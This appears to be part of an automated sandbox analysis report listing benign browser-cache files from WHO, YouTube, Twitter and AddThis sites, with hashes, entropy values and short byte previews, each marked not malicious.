                                                                                                                                                                    MD5:52698A0D30C8361844DE86EB60EE1774
                                                                                                                                                                    SHA1:DAEB778F052B63956D01B24766821ADC18EE4EAD
                                                                                                                                                                    SHA-256:A0E2D4A84566555A9DE5646FBCD7961D0A550336FEFCA78F065E8D975B85A72A
                                                                                                                                                                    SHA-512:5A34154682E9A6035D3AAF07F1E1F1C77D0E0BE8B078E5724B7E93C18507FAA58CFF295850E56CDA00BCE2F145DF0961682D8C574B6BD0D5CE7E1CBE85A505FE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://i.ytimg.com/vi/yEIPefMsf70/maxresdefault.jpg
                                                                                                                                                                    Preview: ......JFIF..........................................................................................................................................................."..........................................Y..........................!1AQ.."a.q.2.....#BRU...V....$3EbCSTrt.....5D.Fs....%469cuv.................................,......................!.1...A"QR.2ab.B.#q3............?..T.!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\print.min[1].css
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):2051
                                                                                                                                                                    Entropy (8bit):4.951787000714645
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:wmhsFdMMy/bAGtv1TdbSRm75RSSGkMWt2ZmTLXAf5q5GO:AWmT0DGoZ
                                                                                                                                                                    MD5:CF9593C4BE04185D1DFEB8344FD65A5C
                                                                                                                                                                    SHA1:D0D215D0F95AD5505CE33562F89D683963DA3742
                                                                                                                                                                    SHA-256:09652EBACDB38A225D91FBA3C56C920454B153DAB2B0AF42B6C67363960EA655
                                                                                                                                                                    SHA-512:A8BC8DED55D7A32029D1EEC9D5AD4F6DF3C1AA8FCA8F44ABF519D812101A76D648573FF362AAF194A3397BA823DE0A7BA79AF25BF5FDB94C61EA44989BE99B52
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/styles/print.min.css?v=12.1.7126.28741
                                                                                                                                                                    Preview: @page{margin:2cm 1cm}@media print{.sf-body{font-family:Garamond, Helvetica, sans-serif;font-size:12pt;line-height:1.25em}.sf-body h1{margin:0.5cm 0 !important;font-size:36pt !important;line-height:1.25em !important}.sf-body h2{margin:0.5cm 0 !important;font-size:24pt !important;line-height:1.25em !important}.sf-body h3{font-size:18pt !important;line-height:1.25em !important}.sf-body h4{font-size:14pt !important;line-height:1.25em !important}.sf-body *,.sf-body *:before,.sf-body *:after{box-shadow:none !important;text-shadow:none !important}.sf-body a{color:#3c4245}.sf-body a,.sf-body a:visited{text-decoration:underline}.sf-body a[href]:after{content:none !important}.sf-body abbr[title]:after{content:" (" attr(title) ")"}.sf-body a[href^="#"]:after,.sf-body a[href^="javascript:"]:after{content:""}.sf-body pre,.sf-body blockquote{border:1px solid #999;page-break-inside:avoid}.sf-body thead{display:table-header-group}.sf-body tr,.sf-body img{page-break-inside:avoid}.sf-body img{max-width:
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\publications-hero-image-thumb[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 549x315, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):22804
                                                                                                                                                                    Entropy (8bit):7.949652507694008
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:YvxIoRoshSIt4S+SMRS/Y4qjMFxKOXHNd7jd8zjnu7boKf3Ovd:zoRbSItD+Q/nq3ujm3nufPmvd
                                                                                                                                                                    MD5:5AA9FA7785CDDABEC52DFD1D428C553E
                                                                                                                                                                    SHA1:A2FC524C35815EEE0CFAA3324FEA4ED4D754A41A
                                                                                                                                                                    SHA-256:F84DC74BA342D1CD17A928F33B127D33D563ED584CBDBA7765A8AE71BB3DB76B
                                                                                                                                                                    SHA-512:84007F6C1B9375CC9AEB7162BB8717A77B3E5613E5759FC05CF107EEEC3CC52C04EE12DF1420005113308FA58A4A4B5521236C41AF843F05CF39AB4390E613C8
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/publications/publications-hero-image-thumb.tmb-549v.jpg?sfvrsn=8174ac48_1
                                                                                                                                                                    Preview: ......JFIF.............C..............................................!........."$".$.......C.......................................................................;.%.."...............................................................................G..............................................................tD..]DB]DB]DB]DB]DB]DB]DB]D~.."....xuNS.rC.r>.{...\o.f..B.................>v..Gu;c..{...{.O..U..=..'..............>..'.~...i..!.&T..fq..5.D/L.L.fw...H.$.8.F..............|..O..v........._.G..j...>q[.....r....U.....v.B.Of..vN.(...r.#.r..S..]\u..+nBU....F..............|..O..v.sDA=..o.Nv...XL.5..(.k.k&...U...U......G.....DN.....M.\..D},E.1...M=................*......g..z..^..[<.U...v..`.V.V.V.V.V....-..j..t+.E..PEs..;i.6`..............o.~v....Y.&.4|WS..'WG1.G)..?W.C7.*L..0j6y:/..A.3@.l.&..>.5.x.@.D..FD....@..6`..............o.~v....Y.&.9.Q....Qo:i-...y.2X..>..d.{...z..li.T....^...._....).g...|z<z<z<z<{............OF].z.&.]..p..._>v.........Je..W.
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\remote[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):99077
                                                                                                                                                                    Entropy (8bit):5.447801988861071
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:Axf+m+dKlEf6646K2u0VX5FVOtNJzyLh1Ukwd0PwFJx:0Gm+dKC6P6Kd0VX5FVOtNJzyLh1UkwdR
                                                                                                                                                                    MD5:370C2D515006EEE1E72A820CA6F56E61
                                                                                                                                                                    SHA1:8E67BBAA4CA7FA9CE9F7217F931F8ECC116CFC1F
                                                                                                                                                                    SHA-256:9A3AC37A731E20B60F6A8A83C325B99B51A9E6647C747C196E0626F0FA5AB631
                                                                                                                                                                    SHA-512:3638091B852079A556C10B6D90B0CCF14D748DD09FD255A8FB878DA27D5A8240AD0001CBE81DEA535A3659D65FF8C5D3F33549FA7330E49CE28C78C26AD1CD4C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.youtube.com/s/player/9f1ab255/player_ias.vflset/en_US/remote.js
                                                                                                                                                                    Preview: (function(g){var window=this;'use strict';var PIa=function(a,b){return g.Nb(a,b)},k4=function(a,b,c){a.l.set(b,c)},l4=function(a){k4(a,"zx",Math.floor(2147483648*Math.random()).toString(36)+Math.abs(Math.floor(2147483648*Math.random())^g.Ta()).toString(36));.return a},m4=function(a,b,c){Array.isArray(c)||(c=[String(c)]);.g.Um(a.l,b,c)},QIa=function(a,b){var c=[];.g.Si(b,function(d){try{var e=g.In.prototype.l.call(this,d,!0)}catch(f){if("Storage: Invalid value was encountered"==f)return;throw f;}void 0===e?c.push(d):g.Hn(e)&&c.push(d)},a);.return c},RIa=function(a,b){b=QIa(a,b);.g.zb(b,function(c){g.In.prototype.remove.call(this,c)},a)},SIa=function(a){if(a.W){if(a.W.locationOverrideToken)return{locationOverrideToken:a.W.locationOverrideToken};.if(null!=a.W.latitudeE7&&null!=a.W.longitudeE7)return{latitudeE7:a.W.latitudeE7,longitudeE7:a.W.longitudeE7}}return null},TIa=function(a,b){g.fb(a,b)||a.push(b)},n4=function(a){var b=0,c;.for(c in a)b++;return b},UIa=function(a,b){b=b instanceof
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\thumbs_covid-map.tmb-479v[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 479x269, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):23346
                                                                                                                                                                    Entropy (8bit):7.955372285250941
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:KoCathmwmvn348bnhSunvreQ5UMvGRpvCDN5lsUEd9YVLf+cabQGjx9El0Jpd4WA:PmwWnIWlQpvI5sUEdPcpGjxeUyW1Ox
                                                                                                                                                                    MD5:948620EE0F78512CE7C51E540E7C6397
                                                                                                                                                                    SHA1:264DC33227F2D56D40C7671A22F20D202A3B1395
                                                                                                                                                                    SHA-256:B3E4348B7B78FFA71C370F66E53B2B3E5BEFAA8F6CD7E2FFF967CF46DE09A7F6
                                                                                                                                                                    SHA-512:204B1EFAF2F9A9D12DFE3B9241170334F28B4FFC8DF8F5204F51EFD063B9ADBB204E644BA31540258939FA92D3E3EB519C0F9A263F5B79896898A107E16314CA
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://cdn.who.int/media/images/default-source/who_homepage/thumbs_covid-map.tmb-479v.jpg
                                                                                                                                                                    Preview: ......JFIF.............C..............................................!........."$".$.......C............................................................................".............................................................................../..3.....F...D.fu"v.8..3H.I%n.0k...z..kQ(..ey.......k......F...G..lF.e....[..hy1.:.M..6.....1.Q..c|.2..!I.F..).<....Xu.Giu.b<..,...NY.5.....@.CY.g. v..o....a.x...^Y5.L.a"<.W...GN.d..jD.m.G!m.......$.du..0t'........(...u.|......~L.U...`..e.g$.q ..!.h...a...C.w.\..h...z.......F......c.X..c.+z.........7.$..Q.'.S.....8T.yK.........+..r./Cn..4.".3.....U2.....*[.X!G..,..8...P...kGwG~_/wm.V...{J....z<..i..'.......WK.,....W.....3.....8L9:.N.#cM%\.[..U6N.8.".7.-%..6.oV....<....z.O..}.u..S#.S.pz~........d9....$.....2q..1.:..H..Hb1..O......(eQ......j..t.n....+..-8.*....I...k..G.3o.WqSoU..ly.?.:.....N?].$.~.9.v1S99..<.J.3.@...n..yj..OK.3.ht.dl..?+..P.c$r@..G<......d...zM..io..q..k....|(........v....
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\thumbs_interactive-timeline.tmb-479v[1].png
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:PNG image data, 479 x 269, 8-bit/color RGB, non-interlaced
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):25897
                                                                                                                                                                    Entropy (8bit):7.9285805511652745
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:ukfqZ7tzf6MGfhrO0ABtPUZIVC4wZjn1iiCq:uKqZQl5O5/UKdwNnQM
                                                                                                                                                                    MD5:AA21BCAF6ED6F80B83E46DC68CE1D63F
                                                                                                                                                                    SHA1:53681EE86AC41E7740286CC0C389EA7D1481E97B
                                                                                                                                                                    SHA-256:818614F988027EE371283F8879EB5B5323DA105CFA5DE45AC1CE45103FD52F2E
                                                                                                                                                                    SHA-512:BD3AA4C521A01A8AF33F650B6DB33993657E40E66351D0F6509FA13D252C4C61130D5782AF3369161A6ACA16AF67ED9C9579AA80E56A4CF55547A2681E3FAD4D
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://cdn.who.int/media/images/default-source/who_homepage/thumbs_interactive-timeline.tmb-479v.png
                                                                                                                                                                    Preview: .PNG........IHDR................+....sRGB.........gAMA......a...d.IDATx....$G}.=6..0..d0....`.......e06...g.d..".#.( .$...$].w:Iw.'..).taw6.fwr.t.....'t...I.{w....g..~oWWW.[[.3..Jq$V$..,i..$.'.r..#......Rl..pba...s..R.M].]..~.L..V`!/....ec.g.K.yq2.?9S8.g_lKwe.......k..z..k(.!...N.p.G_A....=..#.1..[..^v~...^..P........Gr>;.xb!I..y.....d"/...y*...)".<......G.oK..B.SM.S......D..$.....!.1.Z~... !.?.,....~.=.O..?.....M.}.'.j.....=..;.L$)1........=.%Jl\n..E..F....{i......Y.....\.i..Ht......W...C&......M........j.Z..^>>.*.|.....\.|..s.Fb.|..p}....H.....s. -R...Ym...~..q..H.kQvNR.tNx.i.......h..c..H.X..+.F.3.....KW...O$............z..x..K.........OWG%....3u.G2(~:.U25......{..v..d"m......7.,.h.!._.,Q......L..Y.....<..v.n..X...b#...O#.H..f.:......G&....a.\...8;Kc.~........l^.i.b...sO..O..<....X.....+m.^W.dxO.k.h..(..g..g...~u..uH.J?..>>2.sF.k.{..]..|..Y?.....q.U.R..c.6...2._)3Z.}..~..8.,._:.T.....X>...V.....E.x~...c.}.j.......cQ..../.._,...
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\unnamed[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:[TIFF image data, little-endian, direntries=1, software=Google], baseline, precision 8, 68x68, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):4345
                                                                                                                                                                    Entropy (8bit):7.874582079474217
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:m/KOrKlpGRcTXmkJjTCvXeyGg/05HyMIg1t9PdW15ZO:krEpGiXmh7GL5HJIg1ta8
                                                                                                                                                                    MD5:A61EFD487B024B49CA85B9D40879C791
                                                                                                                                                                    SHA1:C08CA9F9B4522B46A04F9EFD479851801122D8B4
                                                                                                                                                                    SHA-256:7796E8CC5B092DA7FB429290CFAEB9C30CA82C2230F34E125A6E6D9FCDEAA588
                                                                                                                                                                    SHA-512:C2B5B0035D2E48402BF351AA4C537A2EEEA2B8DF4C8919B700A332CEF776FCD9572AF115DA8E61436F4FDB36390ACAD491FE4CF8D597E743FB363B28CD1C5697
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://yt3.ggpht.com/ytc/AAUvwnh1J3YmbofB6Ft63iBCJsPMhbnsTbCEVyG0BXKw0g=s68-c-k-c0x00ffffff-no-rj
                                                                                                                                                                    Preview: ......JFIF.............*Exif..II*.......1...............Google..............................................................................................................................................D.D..........................................2............................!".1..#A$2Q.35BRSr...................................3......................!..1."A.2Qa...BRq.#..3..Sr.............?.Y..+.z4QF.('.$....1.L3X.6.+.ch...v.e.o.G..7.... .F.Y.n.-m...c.r)..{.v.y.....i........_....(.E.h...PO....+..V...B....4...\.bn..4..fg.I..i.5..Q.e.gaW.uBo~^..s.'h.... ..$.Wm.C.?.b;-.!K.B.<. ._.e.C..l.H..F.b...Aq.I...'.H...".y%{L...^.7.kF..8;..y..`..s,...)..H4..._Q.=8.n8.D)..".D.f..H.Fse...+.......-,5.V..D>RA"O..Y..q..0..r ....9.].)`w.|0*G.#p..*..Y.[x,-.....(......N1.F..........KJ.O'..E....d^.#......p%.B..8.d..2J.8 ...j.k.Xk.t..p.'z\..D.qXeLL..!.Kwn.}...a...ZB..@.9.........O.:..u+...S...........t.....r<.#..C.....MRTh...Wc.De2T.Xn..X..o...+?.A.....Fu.@$.....V.....0R~....Mz..
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\widgets[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):97892
                                                                                                                                                                    Entropy (8bit):5.182853024618601
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:NC4PzC7TEHd2NqDrbGvbCDkcOpO+Jjoo7sgeu8ryM2gSeS/:tziE9ucKJvjwNFS/
                                                                                                                                                                    MD5:965FCFC23C3459AFE3EBF42B92F31E6D
                                                                                                                                                                    SHA1:58534C361D8075239384536D7E67B2A667885636
                                                                                                                                                                    SHA-256:0CCADAC47F8DB7D9086CB5D1A3230580EE43E7DB056734068CE3785376E90500
                                                                                                                                                                    SHA-512:7A29E9C28245E99422C470017D23685D7B9FCAB2969E74A12A5820BA38C89753EE289F601942C55BF29AC3595485E0BBF61F369F8598A370766B9FEFCE75696E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://platform.twitter.com/widgets.js
                                                                                                                                                                    Preview: Function&&Function.prototype&&Function.prototype.bind&&(/(MSIE ([6789]|10|11))|Trident/.test(navigator.userAgent)||(window.__twttr&&window.__twttr.widgets&&window.__twttr.widgets.loaded&&window.twttr.widgets.load&&window.twttr.widgets.load(),window.__twttr&&window.__twttr.widgets&&window.__twttr.widgets.init||function(t){function e(e){for(var n,i,o=e[0],s=e[1],a=0,c=[];a<o.length;a++)i=o[a],r[i]&&c.push(r[i][0]),r[i]=0;for(n in s)Object.prototype.hasOwnProperty.call(s,n)&&(t[n]=s[n]);for(u&&u(e);c.length;)c.shift()()}var n={},r={1:0};function i(e){if(n[e])return n[e].exports;var r=n[e]={i:e,l:!1,exports:{}};return t[e].call(r.exports,r,r.exports,i),r.l=!0,r.exports}i.e=function(t){var e=[],n=r[t];if(0!==n)if(n)e.push(n[2]);else{var o=new Promise(function(e,i){n=r[t]=[e,i]});e.push(n[2]=o);var s,a=document.getElementsByTagName("head")[0],u=document.createElement("script");u.charset="utf-8",u.timeout=120,i.nc&&u.setAttribute("nonce",i.nc),u.src=function(t){return i.p+"js/"+({0:"moment~ti
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\www-player[1].css
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):360299
                                                                                                                                                                    Entropy (8bit):5.2446415637388615
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:yDQI0irpHrpj/fn8MZv8M5q4ayF5G0OXoyUDrzltPljuoOP5FRrDJciM/ByDjI/j:n2bDrzxCHgfyCpLd
                                                                                                                                                                    MD5:00DB9220087CBDB657318871DAE5F9AC
                                                                                                                                                                    SHA1:451BACA7F327209922A56B471616E1194BA4891A
                                                                                                                                                                    SHA-256:D41D7D1BE7BF8A6F809A89A8814C67FEC126AD93CFEDC50F62166BDDF7FA8C63
                                                                                                                                                                    SHA-512:BED7A98A87B69AAA249FFC84634F9307772412E010F4C17288B4937B103B02B8862CFEF0121B8007E80B6107CDE6AEF5605922138D6A45BA93213154262B3A65
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.youtube.com/s/player/9f1ab255/www-player.css
                                                                                                                                                                    Preview: .html5-video-player{position:relative;width:100%;height:100%;overflow:hidden;z-index:0;outline:0;font-family:"YouTube Noto",Roboto,Arial,Helvetica,sans-serif;color:#eee;text-align:left;direction:ltr;font-size:11px;line-height:1.3;-webkit-font-smoothing:antialiased;-webkit-tap-highlight-color:rgba(0,0,0,0);touch-action:manipulation;-ms-high-contrast-adjust:none}.html5-video-player:not(.ytp-transparent),.html5-video-player.unstarted-mode,.html5-video-player.ad-showing,.html5-video-player.ended-mode,.html5-video-player.ytp-fullscreen{background-color:#000}.ytp-big-mode{font-size:17px}.ytp-autohide{cursor:none}.html5-video-player a{color:inherit;text-decoration:none;-moz-transition:color .1s cubic-bezier(0.0,0.0,0.2,1);-webkit-transition:color .1s cubic-bezier(0.0,0.0,0.2,1);transition:color .1s cubic-bezier(0.0,0.0,0.2,1);outline:0}.html5-video-player a:hover{color:#fff;-moz-transition:color .1s cubic-bezier(0.4,0.0,1,1);-webkit-transition:color .1s cubic-bezier(0.4,0.0,1,1);transition:co
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\140.61020b6c086bdb8bc696[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):1672
                                                                                                                                                                    Entropy (8bit):4.148631044851981
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:VH+C4kFTp5GWqUSfq68TbQzBPhUS6ZT08w+Fn+:B44TpX6zTUSqQ6F+
                                                                                                                                                                    MD5:D49B55C641BBC6CB45EAC992C13F3618
                                                                                                                                                                    SHA1:9EF6A645EE35048BF0359CB6B70CFA29D6B4D687
                                                                                                                                                                    SHA-256:25A50F8E41994E7ADDC8B761FD99F5F8560128909835A388EDF76026C7A4C4F6
                                                                                                                                                                    SHA-512:A5ECE009DE90D190F10FE1467F1F9073C8BF20F4D75F0F37B152BF625136D5A5A6D9EA5B766F4A8FB5FCEAA8277A2B33D44D4B44749ACD4B9C5E946136A1E69D
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://s7.addthis.com/static/140.61020b6c086bdb8bc696.js
                                                                                                                                                                    Preview: atwpjp([140],{245:function(c,a){c.exports='<svg width="32" height="32" xmlns="http://www.w3.org/2000/svg"><path d="M16 5c-2.987 0-3.362.013-4.535.066-1.17.054-1.97.24-2.67.512a5.392 5.392 0 0 0-1.95 1.268 5.392 5.392 0 0 0-1.267 1.95c-.272.698-.458 1.498-.512 2.67C5.013 12.637 5 13.012 5 16s.013 3.362.066 4.535c.054 1.17.24 1.97.512 2.67.28.724.657 1.337 1.268 1.95a5.392 5.392 0 0 0 1.95 1.268c.698.27 1.498.457 2.67.51 1.172.054 1.547.067 4.534.067s3.362-.013 4.535-.066c1.17-.054 1.97-.24 2.67-.51a5.392 5.392 0 0 0 1.95-1.27 5.392 5.392 0 0 0 1.268-1.95c.27-.698.457-1.498.51-2.67.054-1.172.067-1.547.067-4.534s-.013-3.362-.066-4.535c-.054-1.17-.24-1.97-.51-2.67a5.392 5.392 0 0 0-1.27-1.95 5.392 5.392 0 0 0-1.95-1.267c-.698-.272-1.498-.458-2.67-.512C19.363 5.013 18.988 5 16 5zm0 1.982c2.937 0 3.285.01 4.445.064 1.072.05 1.655.228 2.042.38.514.198.88.437 1.265.822.385.385.624.75.823 1.265.15.387.33.97.38 2.042.052 1.16.063 1.508.063 4.445 0 2.937-.01 3.285-.064 4.445-.05 1.072-.228 1.655-
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\142.feb3b57b86599b08d012[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):1226
                                                                                                                                                                    Entropy (8bit):4.313458904326628
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:dl+Bauhfd8uONE6ydvtTbAjGjuX310i2gRjjMN:dEfd8uOOdhAkiD4
                                                                                                                                                                    MD5:E823D5B65795FB724B8767DA3BBB784A
                                                                                                                                                                    SHA1:E30468D97EC27FCAF0228AE80000C1DE9A71F876
                                                                                                                                                                    SHA-256:A704781B62EC35CC7A6887777A7D34887E789C2C65B4237C670A1C6A37D1ADD8
                                                                                                                                                                    SHA-512:54C2CECA535D27CDD980F5419435289D57B84D6B3C82EED671904E14746614171484AFDB989C841FD1230243012459316CF4B521347C450BA83882E9671CF6E1
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://s7.addthis.com/static/142.feb3b57b86599b08d012.js
                                                                                                                                                                    Preview: atwpjp([142],{247:function(a,c){a.exports='<svg width="32" height="32" xmlns="http://www.w3.org/2000/svg"><path d="M11.454 23.273a2.63 2.63 0 0 1-.796 1.932 2.63 2.63 0 0 1-1.93.795 2.63 2.63 0 0 1-1.933-.795A2.63 2.63 0 0 1 6 23.273c0-.758.265-1.402.795-1.932a2.63 2.63 0 0 1 1.932-.795c.757 0 1.4.266 1.93.796.532.53.797 1.175.797 1.933zm7.272 1.747a.86.86 0 0 1-.242.682.837.837 0 0 1-.667.298H15.9a.873.873 0 0 1-.61-.234.865.865 0 0 1-.285-.59c-.21-2.168-1.082-4.022-2.62-5.56-1.54-1.54-3.393-2.413-5.56-2.622a.865.865 0 0 1-.59-.284A.873.873 0 0 1 6 16.1V14.18c0-.275.1-.497.298-.668.16-.16.365-.24.61-.24h.072c1.515.122 2.964.503 4.346 1.142 1.382.64 2.61 1.5 3.68 2.578a12.56 12.56 0 0 1 2.576 3.68c.64 1.382 1.02 2.83 1.144 4.346zm7.27.028a.82.82 0 0 1-.254.668.84.84 0 0 1-.654.284h-2.03a.887.887 0 0 1-.633-.25.85.85 0 0 1-.277-.602 15.88 15.88 0 0 0-1.434-5.803c-.843-1.832-1.94-3.423-3.288-4.773-1.35-1.35-2.94-2.445-4.772-3.288a16.085 16.085 0 0 0-5.802-1.45.85.85 0 0 1-.603-.276A.87.8
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\50060660951_bfa6a3fb80_o[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 768x512, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):75277
                                                                                                                                                                    Entropy (8bit):7.982552135572392
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:Zd4g2v5zEElXj89KsKvV6l0TbeV8U+s1rgMwB0Sry9+BVp+vER7GOU:0gy5zEoXjTsKw6TbUNrZt+SW7NU
                                                                                                                                                                    MD5:5524F9B2C9AEBB963928570B5F3A7DCA
                                                                                                                                                                    SHA1:8B28870E47DF29BD1D54CB2E8445981ED6F898D9
                                                                                                                                                                    SHA-256:7C7B9E6103984011AFD1719CF4D8EC232EAEEAB94D84163257A5F9F5AD586666
                                                                                                                                                                    SHA-512:59FC514D0235364157A95EC544DDE2740A02EC1E973672665CAB371C7C8617879A0083A1B1EEA080409AF6ECD2BA918CE46E229683A1421D897F4D2580FC637A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/health-topics/coronavirus/vaccines/50060660951_bfa6a3fb80_o.tmb-768v.jpg?Culture=en&sfvrsn=1ff83aa2_6
                                                                                                                                                                    Preview: ......JFIF.............C..............................................!........."$".$.......C............................................................................"....................................................................................8.L..Q.5Sh.6..,&-[..E....r......K.xH.O.&.`........hB.8..Y..["*].:.4.R..{w.......n..NE}..._+mv.....j..H.l.".3.*+s.........7n.0..'I...=...%S.......+...PlLw.......y y...A.I.9....IL...@..sC....f..m....h.G.d..#>.d..E.3......Z.F...M..U......H....A.$&46(......w@%..+.w3..q.1..E..$.g..).s...Y..-.....dZ&RIq...S.%Wb.m.....Wt'...,.d=.....)......;.....JD~...1..mRI..E.t..D..-......^...a...Fm..i.[....T.S...........R.......$OE.5.W......a.Z..1.E.e...*.K.......n.5.|.E.y..w..?*.%7........9Nj..!.j.st.0#.,..b...J.W.<dymbrp.6.1P0......l...<!MVV.M.?..e...D)..).........[K/B?.....U.r..h4.V..k...M._rg..|&.V...2..?.....[C..3q...2.;...1..lB.P..|WP..,.]..&YL...FeQ.G.z...T.!S.:....w..j....`...B....QL.QP...c...;..%[...m2p'....'.$'...
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\KFOmCnqEu92Fr1Mu4mxM[1].woff
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:Web Open Font Format, TrueType, length 19824, version 1.1
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):19824
                                                                                                                                                                    Entropy (8bit):7.970306766642997
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:ozNCb8EbW9Wg166uwroOp/taiap3K6MC4fsPPuzt+7NCXzS65XZELt:K4zbWcDVwt230hfs+x+Bb65X2
                                                                                                                                                                    MD5:BAFB105BAEB22D965C70FE52BA6B49D9
                                                                                                                                                                    SHA1:934014CC9BBE5883542BE756B3146C05844B254F
                                                                                                                                                                    SHA-256:1570F866BF6EAE82041E407280894A86AD2B8B275E01908AE156914DC693A4ED
                                                                                                                                                                    SHA-512:85A91773B0283E3B2400C773527542228478CC1B9E8AD8EA62435D705E98702A40BEDF26CB5B0900DD8FECC79F802B8C1839184E787D9416886DBC73DFF22A64
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxM.woff
